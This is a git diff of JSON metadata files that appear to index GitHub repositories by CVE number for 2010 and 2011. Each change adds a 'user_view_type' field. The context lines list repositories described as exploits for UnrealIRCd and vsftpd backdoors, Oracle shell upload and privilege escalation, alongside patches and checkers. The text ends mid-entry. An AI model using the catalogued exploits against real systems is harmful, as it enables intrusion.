diff --git a/2010/CVE-2010-1411.json b/2010/CVE-2010-1411.json index c62934d65f..ac18755f95 100644 --- a/2010/CVE-2010-1411.json +++ b/2010/CVE-2010-1411.json @@ -7,7 +7,8 @@ "login": "MAVProxyUser", "id": 2904396, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2904396?v=4", - "html_url": "https:\/\/github.com\/MAVProxyUser" + "html_url": "https:\/\/github.com\/MAVProxyUser", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MAVProxyUser\/httpfuzz-robomiller", "description": "Dumb Fuzzer used to find CVE-2010-1411 ", diff --git a/2010/CVE-2010-1622.json b/2010/CVE-2010-1622.json index 0ec72635b5..25e2929bc0 100644 --- a/2010/CVE-2010-1622.json +++ b/2010/CVE-2010-1622.json @@ -7,7 +7,8 @@ "login": "DDuarte", "id": 530940, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/530940?v=4", - "html_url": "https:\/\/github.com\/DDuarte" + "html_url": "https:\/\/github.com\/DDuarte", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/DDuarte\/springshell-rce-poc", "description": "CVE-2022-22965 - CVE-2010-1622 redux", @@ -42,7 +43,8 @@ "login": "strainerart", "id": 16163685, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16163685?v=4", - "html_url": "https:\/\/github.com\/strainerart" + "html_url": "https:\/\/github.com\/strainerart", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/strainerart\/Spring4Shell", "description": "Threat Intelligence on Zero-Day for Spring4Shell (CVE-2010-1622)", @@ -72,7 +74,8 @@ "login": "HandsomeCat00", "id": 45387035, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45387035?v=4", - "html_url": "https:\/\/github.com\/HandsomeCat00" + "html_url": "https:\/\/github.com\/HandsomeCat00", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/HandsomeCat00\/Spring-CVE-2010-1622", "description": "Spring-CVE-2010-1622", @@ -102,7 +105,8 @@ "login": "E-bounce", "id": 44311693, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44311693?v=4", - "html_url": "https:\/\/github.com\/E-bounce" + "html_url": "https:\/\/github.com\/E-bounce", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/E-bounce\/cve-2010-1622_learning_environment", "description": "cve-2010-1622 Learning Environment", diff --git a/2010/CVE-2010-1938.json b/2010/CVE-2010-1938.json index 612b2ff4c1..46f37cd64e 100644 --- a/2010/CVE-2010-1938.json +++ b/2010/CVE-2010-1938.json @@ -7,7 +7,8 @@ "login": "Nexxus67", "id": 58827641, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58827641?v=4", - "html_url": "https:\/\/github.com\/Nexxus67" + "html_url": "https:\/\/github.com\/Nexxus67", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Nexxus67\/cve-2010-1938", "description": "A simple Python script to test an off-by-one vulnerability in the OPIE library (CVE-2010-1938). This vulnerability affects certain FTP servers and may allow for Denial of Service (DoS) or arbitrary code execution.", diff --git a/2010/CVE-2010-2075.json b/2010/CVE-2010-2075.json index 4d3f2e4eaa..36d9b87188 100644 --- a/2010/CVE-2010-2075.json +++ b/2010/CVE-2010-2075.json @@ -7,7 +7,8 @@ "login": "MFernstrom", "id": 9220603, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9220603?v=4", - "html_url": "https:\/\/github.com\/MFernstrom" + "html_url": "https:\/\/github.com\/MFernstrom", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MFernstrom\/OffensivePascal-CVE-2010-2075", "description": "FreePascal implementation of the UnrealIRCD CVE-2010-2075", @@ -37,7 +38,8 @@ "login": "chancej715", "id": 57548476, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57548476?v=4", - "html_url": "https:\/\/github.com\/chancej715" + "html_url": "https:\/\/github.com\/chancej715", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/chancej715\/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution", "description": "UnrealIRCd 3.2.8.1 backdoor command execution exploit in Python 3 (CVE-2010-2075).", @@ -67,7 +69,8 @@ "login": "FredBrave", "id": 114189847, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114189847?v=4", - "html_url": "https:\/\/github.com\/FredBrave" + "html_url": "https:\/\/github.com\/FredBrave", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/FredBrave\/CVE-2010-2075-UnrealIRCd-3.2.8.1", "description": "Exploit for CVE:2010-2075. This exploit allows remote command execution in UnrealIRCd 3.2.8.1.", @@ -97,7 +100,8 @@ "login": "JoseLRC97", "id": 56311988, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56311988?v=4", - "html_url": "https:\/\/github.com\/JoseLRC97" + "html_url": "https:\/\/github.com\/JoseLRC97", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JoseLRC97\/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution", "description": "Script that exploits the vulnerability that allows establishing a backdoor in the UnrealIRCd service with CVE-2010-2075", @@ -127,7 +131,8 @@ "login": "nwclasantha", "id": 48653609, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48653609?v=4", - "html_url": "https:\/\/github.com\/nwclasantha" + "html_url": "https:\/\/github.com\/nwclasantha", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nwclasantha\/unreal_ircd_3281_backdoor_and_mitigation", "description": "The UnrealIRCd 3.2.8.1 Backdoor is associated with CVE-2010-2075, a well-known vulnerability that was introduced when the source code of the UnrealIRCd software was compromised.", diff --git a/2010/CVE-2010-2387.json b/2010/CVE-2010-2387.json index 9bddaa0813..cd1d8137a4 100644 --- a/2010/CVE-2010-2387.json +++ b/2010/CVE-2010-2387.json @@ -7,7 +7,8 @@ "login": "LogSec", "id": 81561547, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81561547?v=4", - "html_url": "https:\/\/github.com\/LogSec" + "html_url": "https:\/\/github.com\/LogSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/LogSec\/CVE-2010-2387", "description": null, diff --git a/2010/CVE-2010-2553.json b/2010/CVE-2010-2553.json index f6f41ba284..f74a684313 100644 --- a/2010/CVE-2010-2553.json +++ b/2010/CVE-2010-2553.json @@ -7,7 +7,8 @@ "login": "Sunqiz", "id": 59192636, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", - "html_url": "https:\/\/github.com\/Sunqiz" + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sunqiz\/cve-2010-2553-reproduction", "description": "cve-2010-2553复现", diff --git a/2010/CVE-2010-3124.json b/2010/CVE-2010-3124.json index a594b10f06..479e880feb 100644 --- a/2010/CVE-2010-3124.json +++ b/2010/CVE-2010-3124.json @@ -7,7 +7,8 @@ "login": "Nhom6KTLT", "id": 164466034, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164466034?v=4", - "html_url": "https:\/\/github.com\/Nhom6KTLT" + "html_url": "https:\/\/github.com\/Nhom6KTLT", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Nhom6KTLT\/CVE-2010-3124", "description": null, @@ -37,7 +38,8 @@ "login": "KOBUKOVUI", "id": 149545640, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149545640?v=4", - "html_url": "https:\/\/github.com\/KOBUKOVUI" + "html_url": "https:\/\/github.com\/KOBUKOVUI", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/KOBUKOVUI\/DLL_Injection_On_VLC", "description": "DLL Injection and CVE-2010-3124", diff --git a/2010/CVE-2010-3332.json b/2010/CVE-2010-3332.json index 7b4e529c27..4c05a14dae 100644 --- a/2010/CVE-2010-3332.json +++ b/2010/CVE-2010-3332.json @@ -7,7 +7,8 @@ "login": "bongbongco", "id": 3170006, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3170006?v=4", - "html_url": "https:\/\/github.com\/bongbongco" + "html_url": "https:\/\/github.com\/bongbongco", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bongbongco\/MS10-070", "description": "CVE-2010-3332 Oracle Padding Vulnerability in Microsoft ASP.NET", diff --git a/2010/CVE-2010-3333.json b/2010/CVE-2010-3333.json index 6473e9d555..33524e4bfd 100644 --- a/2010/CVE-2010-3333.json +++ b/2010/CVE-2010-3333.json @@ -7,7 +7,8 @@ "login": "whiteHat001", "id": 18191034, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18191034?v=4", - "html_url": "https:\/\/github.com\/whiteHat001" + "html_url": "https:\/\/github.com\/whiteHat001", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/whiteHat001\/cve-2010-3333", "description": null, @@ -37,7 +38,8 @@ "login": "Sunqiz", "id": 59192636, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", - "html_url": "https:\/\/github.com\/Sunqiz" + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sunqiz\/CVE-2010-3333-reproduction", "description": "CVE-2010-3333复现", diff --git a/2010/CVE-2010-3490.json b/2010/CVE-2010-3490.json index e8eda7ffb6..9296686085 100644 --- a/2010/CVE-2010-3490.json +++ b/2010/CVE-2010-3490.json @@ -7,7 +7,8 @@ "login": "moayadalmalat", "id": 42471675, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42471675?v=4", - "html_url": "https:\/\/github.com\/moayadalmalat" + "html_url": "https:\/\/github.com\/moayadalmalat", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/moayadalmalat\/CVE-2010-3490", "description": "FreePBX exploit <= 2.8.0", diff --git a/2010/CVE-2010-3600.json b/2010/CVE-2010-3600.json index c4b79cc9ad..b12c107f68 100644 --- a/2010/CVE-2010-3600.json +++ b/2010/CVE-2010-3600.json @@ -7,7 +7,8 @@ "login": "LAITRUNGMINHDUC", "id": 10572765, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10572765?v=4", - "html_url": "https:\/\/github.com\/LAITRUNGMINHDUC" + "html_url": "https:\/\/github.com\/LAITRUNGMINHDUC", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/LAITRUNGMINHDUC\/CVE-2010-3600-PythonHackOracle11gR2", "description": "This Python 3 script is for uploading shell (and other files) to Windows Server \/ Linux via Oracle 11g R2 (CVE-2010-3600).", diff --git a/2010/CVE-2010-3847.json b/2010/CVE-2010-3847.json index 4f4e2e3339..eb1318cdee 100644 --- a/2010/CVE-2010-3847.json +++ b/2010/CVE-2010-3847.json @@ -7,7 +7,8 @@ "login": "magisterquis", "id": 499530, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499530?v=4", - "html_url": "https:\/\/github.com\/magisterquis" + "html_url": "https:\/\/github.com\/magisterquis", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/magisterquis\/cve-2010-3847", "description": "Script to take advantage of CVE-2010-3847", diff --git a/2010/CVE-2010-3904.json b/2010/CVE-2010-3904.json index cb5c23404c..21bb7adbd9 100644 --- a/2010/CVE-2010-3904.json +++ b/2010/CVE-2010-3904.json @@ -7,7 +7,8 @@ "login": "redhatkaty", "id": 5626053, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5626053?v=4", - "html_url": "https:\/\/github.com\/redhatkaty" + "html_url": "https:\/\/github.com\/redhatkaty", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/redhatkaty\/-cve-2010-3904-report", "description": null, diff --git a/2010/CVE-2010-3971.json b/2010/CVE-2010-3971.json index b5adcb57b4..49b80bf522 100644 --- a/2010/CVE-2010-3971.json +++ b/2010/CVE-2010-3971.json @@ -7,7 +7,8 @@ "login": "nektra", "id": 2100960, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2100960?v=4", - "html_url": "https:\/\/github.com\/nektra" + "html_url": "https:\/\/github.com\/nektra", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nektra\/CVE-2010-3971-hotpatch", "description": "Do you own security hotfix with Deviare hooking", diff --git a/2010/CVE-2010-4221.json b/2010/CVE-2010-4221.json index bb0a36b1e9..a37c7badf9 100644 --- a/2010/CVE-2010-4221.json +++ b/2010/CVE-2010-4221.json @@ -7,7 +7,8 @@ "login": "M41doror", "id": 10201432, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10201432?v=4", - "html_url": "https:\/\/github.com\/M41doror" + "html_url": "https:\/\/github.com\/M41doror", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/M41doror\/cve-2010-4221", "description": "This exploit was written to study some concepts, enjoy!", diff --git a/2010/CVE-2010-4231.json b/2010/CVE-2010-4231.json index 1d0f65649d..b10ebead8a 100644 --- a/2010/CVE-2010-4231.json +++ b/2010/CVE-2010-4231.json @@ -7,7 +7,8 @@ "login": "K3ysTr0K3R", "id": 70909693, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", - "html_url": "https:\/\/github.com\/K3ysTr0K3R" + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2010-4231-EXPLOIT", "description": "A PoC exploit for CVE-2010-4231 - Directory Traversal Vulnerability in Camtron and TecVoz IP Cameras.", diff --git a/2010/CVE-2010-4476.json b/2010/CVE-2010-4476.json index 6f8b73ae4f..dac7ab01eb 100644 --- a/2010/CVE-2010-4476.json +++ b/2010/CVE-2010-4476.json @@ -7,7 +7,8 @@ "login": "grzegorzblaszczyk", "id": 72544, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72544?v=4", - "html_url": "https:\/\/github.com\/grzegorzblaszczyk" + "html_url": "https:\/\/github.com\/grzegorzblaszczyk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/grzegorzblaszczyk\/CVE-2010-4476-check", "description": "http:\/\/www.oracle.com\/technetwork\/topics\/security\/alert-cve-2010-4476-305811.html", diff --git a/2010/CVE-2010-4669.json b/2010/CVE-2010-4669.json index 2e1692dd19..34706cafc8 100644 --- a/2010/CVE-2010-4669.json +++ b/2010/CVE-2010-4669.json @@ -7,7 +7,8 @@ "login": "wrong-commit", "id": 44012200, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44012200?v=4", - "html_url": "https:\/\/github.com\/wrong-commit" + "html_url": "https:\/\/github.com\/wrong-commit", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wrong-commit\/CVE-2010-4669", "description": null, diff --git a/2010/CVE-2010-4804.json b/2010/CVE-2010-4804.json index 5375532677..070e0e2e7f 100644 --- a/2010/CVE-2010-4804.json +++ b/2010/CVE-2010-4804.json @@ -7,7 +7,8 @@ "login": "thomascannon", "id": 1297160, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1297160?v=4", - "html_url": "https:\/\/github.com\/thomascannon" + "html_url": "https:\/\/github.com\/thomascannon", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/thomascannon\/android-cve-2010-4804", "description": "Android Data Stealing Vulnerability", diff --git a/2010/CVE-2010-5230.json b/2010/CVE-2010-5230.json index 93855c0c3a..38ac8edcc2 100644 --- a/2010/CVE-2010-5230.json +++ b/2010/CVE-2010-5230.json @@ -7,7 +7,8 @@ "login": "otofoto", "id": 26463333, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26463333?v=4", - "html_url": "https:\/\/github.com\/otofoto" + "html_url": "https:\/\/github.com\/otofoto", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/otofoto\/CVE-2010-5230", "description": "Multiple untrusted search path vulnerabilities in MicroStation 7.1 allow local users to gain privileges via a Trojan horse (1) mptools.dll, (2) baseman.dll, (3) wintab32.dll, or (4) wintab.dll file in the current working directory, as demonstrated by a directory that contains a .hln or .rdl file. NOTE: some of these details are obtained from third party information.", diff --git a/2010/CVE-2010-5301.json b/2010/CVE-2010-5301.json index f870aa9bac..9db2f1e9ef 100644 --- a/2010/CVE-2010-5301.json +++ b/2010/CVE-2010-5301.json @@ -7,7 +7,8 @@ "login": "lem0nSec", "id": 98479572, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98479572?v=4", - "html_url": "https:\/\/github.com\/lem0nSec" + "html_url": "https:\/\/github.com\/lem0nSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/lem0nSec\/CVE-2010-5301", "description": "A proof of concept of an SEH overflow with arbitrary dll injection", diff --git a/2011/CVE-2011-0104.json b/2011/CVE-2011-0104.json index 2fc41eb390..b2401e403e 100644 --- a/2011/CVE-2011-0104.json +++ b/2011/CVE-2011-0104.json @@ -7,7 +7,8 @@ "login": "Sunqiz", "id": 59192636, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", - "html_url": "https:\/\/github.com\/Sunqiz" + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sunqiz\/CVE-2011-0104-reproduction", "description": "CVE-2011-0104复现", diff --git a/2011/CVE-2011-0228.json b/2011/CVE-2011-0228.json index ce45495816..3b0c0843c5 100644 --- a/2011/CVE-2011-0228.json +++ b/2011/CVE-2011-0228.json @@ -7,7 +7,8 @@ "login": "jan0", "id": 101830, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101830?v=4", - "html_url": "https:\/\/github.com\/jan0" + "html_url": "https:\/\/github.com\/jan0", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jan0\/isslfix", "description": "CVE-2011-0228 fix for older idevices\/firmwares", diff --git a/2011/CVE-2011-1237.json b/2011/CVE-2011-1237.json index 3786e9331b..4956c27a2e 100644 --- a/2011/CVE-2011-1237.json +++ b/2011/CVE-2011-1237.json @@ -7,7 +7,8 @@ "login": "BrunoPujos", "id": 28804193, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28804193?v=4", - "html_url": "https:\/\/github.com\/BrunoPujos" + "html_url": "https:\/\/github.com\/BrunoPujos", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/BrunoPujos\/CVE-2011-1237", "description": "POC for exploit of CVE-2011-1237", diff --git a/2011/CVE-2011-1249.json b/2011/CVE-2011-1249.json index 70af832d44..04fd7eb292 100644 --- a/2011/CVE-2011-1249.json +++ b/2011/CVE-2011-1249.json @@ -7,7 +7,8 @@ "login": "Madusanka99", "id": 50735991, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50735991?v=4", - "html_url": "https:\/\/github.com\/Madusanka99" + "html_url": "https:\/\/github.com\/Madusanka99", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Madusanka99\/OHTS", "description": "Microsoft Windows - 'afd.sys' Local Kernel Privilege Escalation Exploit Report (CVE-2011-1249)", @@ -37,7 +38,8 @@ "login": "NyxByt3", "id": 66146701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", - "html_url": "https:\/\/github.com\/NyxByt3" + "html_url": "https:\/\/github.com\/NyxByt3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NyxByt3\/CVE-2011-1249", "description": null, diff --git a/2011/CVE-2011-1473.json b/2011/CVE-2011-1473.json index 25cf2f4323..54f9035fdd 100644 --- a/2011/CVE-2011-1473.json +++ b/2011/CVE-2011-1473.json @@ -7,7 +7,8 @@ "login": "zjt674449039", "id": 47102219, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47102219?v=4", - "html_url": "https:\/\/github.com\/zjt674449039" + "html_url": "https:\/\/github.com\/zjt674449039", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zjt674449039\/cve-2011-1473", "description": null, @@ -37,7 +38,8 @@ "login": "XDLDCG", "id": 54423687, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54423687?v=4", - "html_url": "https:\/\/github.com\/XDLDCG" + "html_url": "https:\/\/github.com\/XDLDCG", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/XDLDCG\/bash-tls-reneg-attack", "description": "A bash script that attempts to flood a server with TLS renegotiations by using the openssl client. See CVE-2011-1473 and CVE-2011-1473 for details.", diff --git a/2011/CVE-2011-1475.json b/2011/CVE-2011-1475.json index 86513b53ef..2abbcf3546 100644 --- a/2011/CVE-2011-1475.json +++ b/2011/CVE-2011-1475.json @@ -7,7 +7,8 @@ "login": "samaujs", "id": 13311002, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13311002?v=4", - "html_url": "https:\/\/github.com\/samaujs" + "html_url": "https:\/\/github.com\/samaujs", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/samaujs\/CVE-2011-1475", "description": "Check with Maven on CVE-2011-1475", diff --git a/2011/CVE-2011-1485.json b/2011/CVE-2011-1485.json index 3c7c7d14c3..1bd60ecb73 100644 --- a/2011/CVE-2011-1485.json +++ b/2011/CVE-2011-1485.json @@ -7,7 +7,8 @@ "login": "Pashkela", "id": 4710642, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4710642?v=4", - "html_url": "https:\/\/github.com\/Pashkela" + "html_url": "https:\/\/github.com\/Pashkela", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Pashkela\/CVE-2011-1485", "description": "CVE-2011-1485 - Published: 2011-04-01 - PolicyKit:", diff --git a/2011/CVE-2011-1571.json b/2011/CVE-2011-1571.json index 6e4c433531..0fbed014d8 100644 --- a/2011/CVE-2011-1571.json +++ b/2011/CVE-2011-1571.json @@ -7,7 +7,8 @@ "login": "noobpk", "id": 31820707, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31820707?v=4", - "html_url": "https:\/\/github.com\/noobpk" + "html_url": "https:\/\/github.com\/noobpk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/noobpk\/CVE-2011-1571", "description": "Liferay XSL - Command Execution (Metasploit)", diff --git a/2011/CVE-2011-1575.json b/2011/CVE-2011-1575.json index 8f49ab1be1..be1454e21d 100644 --- a/2011/CVE-2011-1575.json +++ b/2011/CVE-2011-1575.json @@ -7,7 +7,8 @@ "login": "masamoon", "id": 3777988, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3777988?v=4", - "html_url": "https:\/\/github.com\/masamoon" + "html_url": "https:\/\/github.com\/masamoon", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/masamoon\/cve-2011-1575-poc", "description": "Very simple script to test for cve 2011-1575", diff --git a/2011/CVE-2011-1720.json b/2011/CVE-2011-1720.json index 9b7c0a9937..40b02836d2 100644 --- a/2011/CVE-2011-1720.json +++ b/2011/CVE-2011-1720.json @@ -7,7 +7,8 @@ "login": "nbeguier", "id": 7660866, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7660866?v=4", - "html_url": "https:\/\/github.com\/nbeguier" + "html_url": "https:\/\/github.com\/nbeguier", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nbeguier\/postfix_exploit", "description": "Exploit of CVE-2011-1720.", diff --git a/2011/CVE-2011-1974.json b/2011/CVE-2011-1974.json index 65e263940e..61201bb385 100644 --- a/2011/CVE-2011-1974.json +++ b/2011/CVE-2011-1974.json @@ -7,7 +7,8 @@ "login": "hittlle", "id": 4122514, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4122514?v=4", - "html_url": "https:\/\/github.com\/hittlle" + "html_url": "https:\/\/github.com\/hittlle", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hittlle\/CVE-2011-1974-PoC", "description": null, diff --git a/2011/CVE-2011-2461.json b/2011/CVE-2011-2461.json index 0610aa292c..5a03b64294 100644 --- a/2011/CVE-2011-2461.json +++ b/2011/CVE-2011-2461.json @@ -7,7 +7,8 @@ "login": "ikkisoft", "id": 6027823, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6027823?v=4", - "html_url": "https:\/\/github.com\/ikkisoft" + "html_url": "https:\/\/github.com\/ikkisoft", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ikkisoft\/ParrotNG", "description": "ParrotNG is a tool capable of identifying Adobe Flex applications (SWF) vulnerable to CVE-2011-2461", @@ -37,7 +38,8 @@ "login": "u-maxx", "id": 2717220, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2717220?v=4", - "html_url": "https:\/\/github.com\/u-maxx" + "html_url": "https:\/\/github.com\/u-maxx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/u-maxx\/magento-swf-patched-CVE-2011-2461", "description": "Patched version of the uploader.swf and uploaderSingle.swf to fix CVE-2011-2461", @@ -67,7 +69,8 @@ "login": "edmondscommerce", "id": 62842, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62842?v=4", - "html_url": "https:\/\/github.com\/edmondscommerce" + "html_url": "https:\/\/github.com\/edmondscommerce", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/edmondscommerce\/CVE-2011-2461_Magento_Patch", "description": null, diff --git a/2011/CVE-2011-2523.json b/2011/CVE-2011-2523.json index a85dfabd0f..33f3521284 100644 --- a/2011/CVE-2011-2523.json +++ b/2011/CVE-2011-2523.json @@ -7,7 +7,8 @@ "login": "HerculesRD", "id": 73125772, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73125772?v=4", - "html_url": "https:\/\/github.com\/HerculesRD" + "html_url": "https:\/\/github.com\/HerculesRD", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/HerculesRD\/vsftpd2.3.4PyExploit", "description": "An exploit to get root in vsftpd 2.3.4 (CVE-2011-2523) written in python", @@ -37,7 +38,8 @@ "login": "nobodyatall648", "id": 35725871, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4", - "html_url": "https:\/\/github.com\/nobodyatall648" + "html_url": "https:\/\/github.com\/nobodyatall648", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2011-2523", "description": "vsftpd 2.3.4 Backdoor Exploit", @@ -67,7 +69,8 @@ "login": "Gr4ykt", "id": 78503985, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78503985?v=4", - "html_url": "https:\/\/github.com\/Gr4ykt" + "html_url": "https:\/\/github.com\/Gr4ykt", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Gr4ykt\/CVE-2011-2523", "description": "https:\/\/www.exploit-db.com\/exploits\/49757", @@ -97,7 +100,8 @@ "login": "padsalatushal", "id": 57517785, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57517785?v=4", - "html_url": "https:\/\/github.com\/padsalatushal" + "html_url": "https:\/\/github.com\/padsalatushal", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/padsalatushal\/CVE-2011-2523", "description": "Python exploit for vsftpd 2.3.4 - Backdoor Command Execution", @@ -134,7 +138,8 @@ "login": "MFernstrom", "id": 9220603, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9220603?v=4", - "html_url": "https:\/\/github.com\/MFernstrom" + "html_url": "https:\/\/github.com\/MFernstrom", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MFernstrom\/OffensivePascal-CVE-2011-2523", "description": "FreePascal implementation of the vsFTPD 2.3.4 CVE-2011-2523", @@ -164,7 +169,8 @@ "login": "0xSojalSec", "id": 92203029, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92203029?v=4", - "html_url": "https:\/\/github.com\/0xSojalSec" + "html_url": "https:\/\/github.com\/0xSojalSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xSojalSec\/-CVE-2011-2523", "description": "Python exploit for CVE-2011-2523 (VSFTPD 2.3.4 Backdoor Command Execution)", @@ -194,7 +200,8 @@ "login": "0xSojalSec", "id": 92203029, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92203029?v=4", - "html_url": "https:\/\/github.com\/0xSojalSec" + "html_url": "https:\/\/github.com\/0xSojalSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xSojalSec\/CVE-2011-2523", "description": "Python exploit for CVE-2011-2523 (VSFTPD 2.3.4 Backdoor Command Execution)", @@ -224,7 +231,8 @@ "login": "XiangSi-Howard", "id": 54540850, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54540850?v=4", - "html_url": "https:\/\/github.com\/XiangSi-Howard" + "html_url": "https:\/\/github.com\/XiangSi-Howard", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/XiangSi-Howard\/CTF---CVE-2011-2523", "description": null, @@ -254,7 +262,8 @@ "login": "cowsecurity", "id": 74612612, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74612612?v=4", - "html_url": "https:\/\/github.com\/cowsecurity" + "html_url": "https:\/\/github.com\/cowsecurity", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cowsecurity\/CVE-2011-2523", "description": "CVE-2011-2523 exploit", @@ -284,7 +293,8 @@ "login": "Lynk4", "id": 44930131, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44930131?v=4", - "html_url": "https:\/\/github.com\/Lynk4" + "html_url": "https:\/\/github.com\/Lynk4", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Lynk4\/CVE-2011-2523", "description": "Python exploit for vsftpd 2.3.4 - Backdoor Command Execution", @@ -323,7 +333,8 @@ "login": "vaishnavucv", "id": 76824366, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76824366?v=4", - "html_url": "https:\/\/github.com\/vaishnavucv" + "html_url": "https:\/\/github.com\/vaishnavucv", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vaishnavucv\/CVE-2011-2523", "description": "Python exploit for vsftpd 2.3.4 - Backdoor Command Execution ", @@ -353,7 +364,8 @@ "login": "chleba124", "id": 121700816, "avatar_url": 